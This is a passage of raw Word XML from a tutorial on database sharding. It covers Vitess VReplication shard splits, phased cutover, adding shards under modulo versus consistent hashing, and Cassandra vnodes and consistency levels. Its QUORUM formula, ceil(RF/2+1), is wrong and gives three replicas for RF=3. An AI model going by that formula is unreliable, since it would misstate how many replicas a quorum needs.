      </w:r>
    </w:p>
    <w:p w14:paraId="74AD3A24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C6752" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Vitess VReplication (vertical and horizontal replication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F349286" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Built specifically for MySQL sharding migrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE6016F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Used by YouTube, Slack, GitHub, Square</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1E8BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DAD707" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  VReplication engine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01781A1D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Source: MySQL binlog (reads change stream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E7398" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Target: applies changes via standard MySQL writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF57CBE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF410B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard split (1 shard → 2 shards):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F096E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    1. Create two new shards with empty databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458990E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    2. VReplication: copy data from source shard to both new shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49890D37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       (routing based on shard key: half to each new shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CCD744" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    3. Catch up: apply binlog changes to both new shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B0ED7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    4. Traffic cutover (per-query-type, gradually):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50251E5A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       a. Switch replica reads to new shards (low risk, easy to revert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A5124" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       b. Switch primary reads to new shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7A1E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       c. Switch primary writes to new shards (highest risk, final cutover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69F960" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    5. Monitor: if issues detected → revert to source shard (traffic back immediately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58909A09" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    6. After validation period: delete source shard data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E723405" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E427B1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Per-query-type cutover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1779AC1A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Phase 1: replica reads to new shards (read from new, write to old)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC2D80" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Phase 2: primary reads to new shards (still write to old)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA48FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Phase 3: writes to new shards (full cutover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEE250" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCC6B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    If Phase 3 fails: revert to Phase 2 immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F053E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Source shard still has all data (not yet deleted) → safe rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF98FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adding Shards — The Scaling Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CF41C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D939D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>When to add shards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34C5C7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Any shard at &gt; 70% capacity (storage, CPU, RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9431AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query latency increasing trend (approaching M/M/1 non-linear regime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4246CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Anticipated data growth requiring capacity in advance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A35D4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F0E3F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Proactive &gt; reactive: add shards before saturation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19122E01" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Reactive sharding (adding shards while already saturated): extremely risky</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B88CB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → High load during migration → migration takes longer → longer load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433BC8EF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Can spiral into cascading failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679855F5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5A268FBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hash-based shard addition (most disruptive):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465298B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Old: hash(key) % 4 → shards {0,1,2,3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F771D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  New: hash(key) % 8 → shards {0,1,2,3,4,5,6,7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD735B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D34D445" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Migration required: all keys with hash(key)%4 ≠ hash(key)%8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC041A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  = keys where (hash(key)/4)%2 = 1 → approximately 50% of all keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A3240B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA9051" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Migration plan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F307E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Phase 1: Create 4 new empty shards (4,5,6,7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA42D09" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Phase 2: Double-write: writes go to both old and new shard assignments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460953F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Phase 3: Migrate existing data from old shards to new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A9011" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Phase 4: Stop double-write, route all traffic to new assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85B185" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F810E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Double-write ensures reads from new shards are correct before Phase 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC9893" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="59661D83" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Consistent hash shard addition (less disruptive):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8709D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Add new node to ring at random positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0090B853" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Only keys between new node and its predecessor migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC055E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ≈ 1/N fraction of data migrates (N = new shard count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166D059" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053CC89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For 100-shard cluster adding shard 101:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA7451" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Only ~1% of data migrates (keys in the new shard's hash range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD2B61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Other 99% of data unaffected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A660DEA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Much more incremental and manageable than modulo-based resharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3830B681" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="03565FCD">
          <v:rect id="_x0000_i5859" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD64D4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Sharding in Real Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B606608" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cassandra — Consistent Hashing with Vnodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36F953" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cassandra's partitioner implements consistent hashing natively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4407DCBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC1499" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Partitioner: Murmur3Partitioner (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F3EE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Maps partition key → 64-bit integer token (full int64 range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283CC736" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each node owns multiple token ranges (virtual nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB32B5F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A93C3A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Node configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C616AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  num_tokens: 256 (256 virtual nodes per physical node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776063BA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DECCF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3-node cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969AC8B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Node A: 256 token ranges spread across the full int64 space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D2CA8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Node B: 256 token ranges spread across the full int64 space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727712E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Node C: 256 token ranges spread across the full int64 space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D1B15" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4D583" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Total: 768 virtual nodes, each node owns ~1/3 of token space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9FD71D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250C22D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA07701" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Client computes token for partition key: MurmurHash(partition_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70023B59" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Client knows the ring topology (gossip protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ABCB4E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Client routes write to the coordinator for that token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A3407B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Coordinator: writes to replicas (RF=3: this token's three responsible nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EDA406" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA3F09" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Read routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351139B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Client routes read to any of the RF=3 replicas for that token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF6469" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Consistency level determines how many must respond:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C0EEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ONE: fastest, most stale (1 replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60755A76" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    QUORUM: ceil(RF/2+1) replicas must respond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C3BD5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ALL: all RF replicas must respond (slowest, freshest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330217D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68817A58" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Adding a node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F7C2E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  New node announces itself via gossip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008BC502" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Assigned a set of tokens (256 vnodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D119E78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For each vnode: streaming from the current owner of that token range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F912AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Data streams to new node while traffic still routes to old owner</w:t>
      </w:r>
